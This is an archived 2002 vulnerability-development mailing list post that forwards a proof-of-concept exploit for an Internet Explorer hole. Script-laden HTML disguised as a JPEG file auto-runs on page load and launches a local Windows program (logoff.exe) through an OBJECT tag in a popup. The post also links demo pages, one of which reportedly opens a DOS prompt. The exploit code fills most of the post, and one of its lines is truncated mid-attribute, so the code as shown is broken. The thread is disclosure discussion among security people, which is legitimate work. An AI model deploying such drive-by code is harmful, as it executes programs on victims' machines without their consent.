Vulnerability Development mailing list archives
FW: [Re: Rather large MSIE-hole] another variant
From: NoCoNFLiC <nocon () castleblack darkflame net>
Date: Fri, 15 Mar 2002 17:49:31 -0600
[magnus () bodin org] Tue, Mar 12, 2002 at 11:32:20AM +0100 wrote:
The latest MSIE-hole is now spreading. THE ATTACHED HTML-code is served as a jpeg-file, and as MSIE ignores the Content-Type if it "thinks" it knows better, then the code is executed. This in combination with the malicious code that is possible to run, then an "innocent.jpg" with the following content will log off an XP-user. --%< cut here----- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <TITLE>IE6 security...</TITLE> <META http-equiv=Content-Type content="text/html; charset=windows-1252"> <SCRIPT language=JScript> var programName=new Array( 'c:/windows/system32/logoff.exe', 'c:/winxp/system32/logoff.exe', 'c:/winnt/system32/logoff.exe' ); function Init(){ var oPopup=window.createPopup(); var oPopBody=oPopup.document.body; var n,html=''; for(n=0;n<programName.length;n++) html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' C oPopBody.innerHTML=html; oPopup.show(290, 390, 200, 200, document.body); } </SCRIPT> </head> <BODY onload="Init()"> You should feel lucky if you dont have XP right now. </BODY> </HTML> --%< cut here----- -- magnus MICROS~1 BOB was written in Lisp. http://x42.com/
Just passing this along, as some may not be on the sec-basics list. -----Original Message----- From: Sprissler, Noah [mailto:NSPRISSLER () PARTNERS ORG] Sent: March 12, 2002 10:31 To: security-basics () security-focus com Subject: RE: scary site That's interesting. I have disabled active scripting as most have suggested and the http://www.liquidwd.freeserve.co.uk/ link stops bringing up a DOS prompt. However, if I goto this link from Greymagic http://security.greymagic.com/adv/gm001-ie/simplebind.html their implementation of this works fine no matter what settings I disable. Win2k with all patches, IE6 with all patches. -Noah -----Original Message----- -- - nocon ====================================== nocon () darkflame net http://nocon.darkflame.net ======================================
Current thread:
- RE: Disabling the MSIE hole., (continued)
- RE: Disabling the MSIE hole. leon (Mar 13)
- Re: Disabling the MSIE hole. Magnus Bodin (Mar 13)
- RE: Disabling the MSIE hole. leon (Mar 13)
- Re: Rather large MSIE-hole Magnus Bodin (Mar 12)
- Re: Rather large MSIE-hole NyQuist (Mar 13)
- Re: Rather large MSIE-hole NoCoNFLiC (Mar 13)
- Re: Rather large MSIE-hole methodic (Mar 14)
- Re: Rather large MSIE-hole Felipe Franciosi (Mar 14)
- Re: Rather large MSIE-hole KF (Mar 14)
- Re: Rather large MSIE-hole jon schatz (Mar 14)
- Re: Rather large MSIE-hole NoCoNFLiC (Mar 15)
- Re: Rather large MSIE-hole NyQuist (Mar 13)
- Re: [Re: Rather large MSIE-hole] another variant (NAV and Finjan block this) David Barnett (Mar 16)
- Re: Rather large MSIE-hole Raul Dias (Mar 13)
- Re: Rather large MSIE-hole Syzop (Mar 14)
- RE: Rather large MSIE-hole Ryan Sweat (Mar 14)
- Re: Rather large MSIE-hole Keegan (Mar 14)